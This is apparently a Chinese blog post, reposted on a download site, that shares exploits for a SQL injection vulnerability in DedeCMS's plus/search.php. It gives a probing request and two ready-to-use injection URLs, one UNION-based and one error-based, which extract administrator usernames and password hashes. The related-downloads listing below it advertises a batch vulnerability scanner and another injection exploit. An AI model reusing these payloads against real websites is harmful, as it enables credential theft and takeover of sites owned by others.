哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
我一般是这样测试的:
提交 mumaasp.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a
看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
QQ截图20130119225931.jpg
看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
QQ截图20130119225757.jpg
如果正常显示证明漏洞不存在了。
from:http://www.mumaasp.com/180.html
分享到:
相关推荐
本插件不会修改任何cms核心文件,采用挂载方式,利用图床和gd库,可自动生成图片,不储存本地,使用缓存技术,不吃硬件性能。对seo方面,非常友好,有利于搜索引擎出图。 apache的伪静态 RewriteRule ^(aiimages)/(....
dedecms批量漏洞扫描,大家可以自己试试效果
PHP实例开发源码—58安卓网dedecms模板 php版.zip PHP实例开发源码—58安卓网dedecms模板 php版.zip PHP实例开发源码—58安卓网dedecms模板 php版.zip
PHP实例开发源码—php淘源码商城dedecms物流网站源码.zip PHP实例开发源码—php淘源码商城dedecms物流网站源码.zip PHP实例开发源码—php淘源码商城dedecms物流网站源码.zip
传智播客PHP教程韩顺平dedecms项目开发笔记.pdf
1、本模板基于DEDECms 5.7 设计,5.5以上的版本都能使用。模板作者介绍:DedeCms特邀设计师,织梦官方论坛版主,多年从事网页设计,网站开发工作. 二、菜单功能 模板安装方法 1、将web文件夹里的文件覆盖到网站根...
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
PHP实例开发源码—58安卓网dedecms模板 php版.zip
wLHK-Dedecms漏洞整理.pdf
演示地址https://www.genban.org/plus/show.php?aid=17750 织梦html5高端网络建站工作室网站源码织梦html5高端网络建站工作室网站源码
基于PHP的泊学网dedecms整站源码.zip
php东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
1. 找前台 RCE , 从他们改动过的代码中看能不能找一个 RCE 出来 2. 找前台注入, DedeCMS 历史中出过很多注入,他们改过的地方有可能会存在注
PHP实例开发源码—泊学网dedecms整站源码.zip
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
dedecms的,页面是比较不错,但是我测试非常慢,非常卡,不知道是我这边网络问题,还是服务器网络波动问题。 是有两套模板一个PC一个手机,手机端也是非常慢。 慢,就是慢,没别的毛病(估计是有加载其他站点或者有...
医院预约挂号系统dedecms插件_gbk.zip
[CMS程序]DedeCms v4.0 RC1 Build20071112_dedecms4.0rc1.zip试卷可打印可复制可编辑